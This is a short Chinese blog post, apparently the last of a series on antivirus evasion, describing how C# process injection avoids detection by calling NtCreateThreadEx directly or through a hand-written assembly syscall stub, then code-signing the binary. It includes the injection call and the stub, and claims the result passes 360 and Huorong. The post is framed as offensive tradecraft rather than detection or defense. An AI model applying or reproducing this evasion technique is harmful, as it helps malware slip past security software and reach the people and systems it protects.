免杀tip3

写在前面：

前两篇文章本着想分享技术、共同交流的目的来与大家分享，无奈，后台收到了大量的diss，如技术过旧、绕不过360等，对于这些东西，我只想引用90社区的话大体如下，技术无论高低，分享都是好的，总是有人需要的。

我们不是没有能过360的免杀，比如我们自用的ps混淆脚本依旧vt可以0杀。

只是所有都需要一个过程，本来是想以系列文章的方式与大家交流、分享，没想到会是这样。故本文为本系列的最后一篇。

本文介绍c#的系统调用来绕过AV。

以进程注入为例，核心代码如下：

调试得知，调用的api为NtCreateThreadEx,直接调用。

类似代码如下：

 NtCreateThreadEx(&ThreadHandle, 0x1FFFFF, NULL, ProcessHandle, (LPTHREAD_START_ROUTINE)LoadLibraryAddress, DllFullPathBufferData, FALSE, NULL, NULL, NULL, NULL);

根据自身去进行修改。

除此之外将其改为.asm调用也可。

.code
   NtCreateThreadEx PROC
    mov r10,rcx
    mov eax,00A5h
    syscall
    ret
   NtCreateThreadEx ENDP
end

然后编译文件，并使用sign进行签名。

最后vt的查杀如下：

virscan查杀结果如下：

测试360、火绒可过，国外未测试。